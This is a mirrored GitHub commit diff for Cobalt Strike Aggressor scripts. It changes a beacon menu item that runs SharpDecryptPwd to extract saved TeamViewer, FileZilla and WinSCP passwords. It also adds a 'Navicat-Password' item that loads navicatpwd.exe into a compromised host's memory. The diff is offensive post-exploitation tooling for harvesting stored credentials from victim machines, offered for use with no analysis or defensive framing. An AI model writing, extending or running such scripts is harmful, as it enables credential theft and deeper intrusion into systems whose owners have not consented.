mirror of
https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
synced 2026-06-08 17:50:44 +00:00
Add files via upload
This commit is contained in:
@@ -13,8 +13,8 @@ popup beacon_bottom {
|
||||
|
||||
item "DecryptPwd" {
|
||||
$bid = $1['@'];
|
||||
$dialog = dialog("SharpDecryptPwd", %(type => "-NavicatCrypto",bid => $bid), &SharpDecryptPwd);
|
||||
drow_combobox($dialog, "type", "Type:", @("-NavicatCrypto", "-TeamViewer", "-FileZilla", "-WinSCP"));
|
||||
$dialog = dialog("SharpDecryptPwd", %(type => "-WinSCP",bid => $bid), &SharpDecryptPwd);
|
||||
drow_combobox($dialog, "type", "Type:", @("-TeamViewer", "-FileZilla", "-WinSCP"));
|
||||
dbutton_action($dialog, "Chong!!!");
|
||||
dialog_show($dialog);
|
||||
}
|
||||
|
||||
Binary file not shown.
@@ -0,0 +1,15 @@
|
||||
sub navicat_password{
|
||||
|
||||
bexecute_assembly($bid, script_resource("modules/navicatpwd.exe"));
|
||||
|
||||
}
|
||||
popup beacon_bottom {
|
||||
menu "NaviDecrypt" {
|
||||
item "Navicat-Password"{
|
||||
$bid = $1['@'];
|
||||
navicat_password($bid);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
Binary file not shown.
Reference in New Issue
Block a user